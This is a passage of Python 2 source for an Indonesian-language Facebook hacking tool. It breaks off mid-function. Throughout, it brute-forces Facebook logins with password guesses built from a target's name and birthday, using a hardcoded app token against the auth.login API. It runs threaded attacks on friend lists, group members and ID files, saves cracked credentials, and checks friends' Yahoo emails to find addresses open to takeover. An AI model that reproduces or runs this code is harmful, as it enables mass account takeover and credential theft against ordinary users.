if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + z['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNomor Telpon\x1b[1;97m : ' + z['mobile_phone']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNomor Telpon\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLokasi\x1b[1;97m : ' + z['location']['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLahir\x1b[1;97m : ' + z['birthday']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLahir\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSekolah\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mTidak Ada'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] Pengguna Tidak Ada'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Mini Hack Facebook (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m2. Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m3. Super Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m4. BruteForce (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m5. Yahoo Clone'
print '║-> \x1b[1;37;40m6. Ambil ID/Email/HP'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
hack_pilih()
def hack_pilih():
hack = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Can\'t empty'
hack_pilih()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mNot found'
hack_pilih()
def mini():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] Target must be your friend !'
try:
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
a = json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mChecking \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[+] \x1b[1;92mOpen security \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
pz1 = a['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz5 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Sorry, opening password target failed :('
print '\x1b[1;91m[!] Try other method.'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file = open(idlist, 'r')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
global cekpoint
global gagal
global up
try:
buka = open(idlist, 'r')
up = buka.read().split()
while file:
username = file.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa = open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append('\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek = open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append('\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Connection busy'
time.sleep(0.01)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
def hasil():
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Failed \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Crack from Friends'
print '║-> \x1b[1;37;40m2. Crack from Group'
print '║-> \x1b[1;37;40m3. Crack from File'
print '║-> \x1b[1;31;40m0. Kembali'
print '\x1b[1;37;40m║'
pilih_super()
def pilih_super():
peak = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_super()
else:
if peak == '1':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id Teman \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '3':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.01)
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']
else:
pass2 = b['firs_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + ['name']
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']
else:
pass4 = b['last_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']
else:
birthday = b['birthday']
pass5 = birthday.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']
else:
pass6 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.5)
login()
else:
os.system('clear')
print logo
print '╔' + 52 * '\x1b[1;97m\xe2\x95\x90'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mTry \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File not found...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why = raw_input('\x1b[1;91m[?] \x1b[1;92mKamu ingin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. From Friends'
print '║-> \x1b[1;37;40m2. From File'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
yahoo_pilih()
def yahoo_pilih():
go = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Can\'t empty'
yahoo_pilih()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mTidak Ditemukan'
yahoo_pilih()
def yahoofriends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token Tidak Ada'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
friends = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
kimak = json.loads(friends.text)
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mSimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
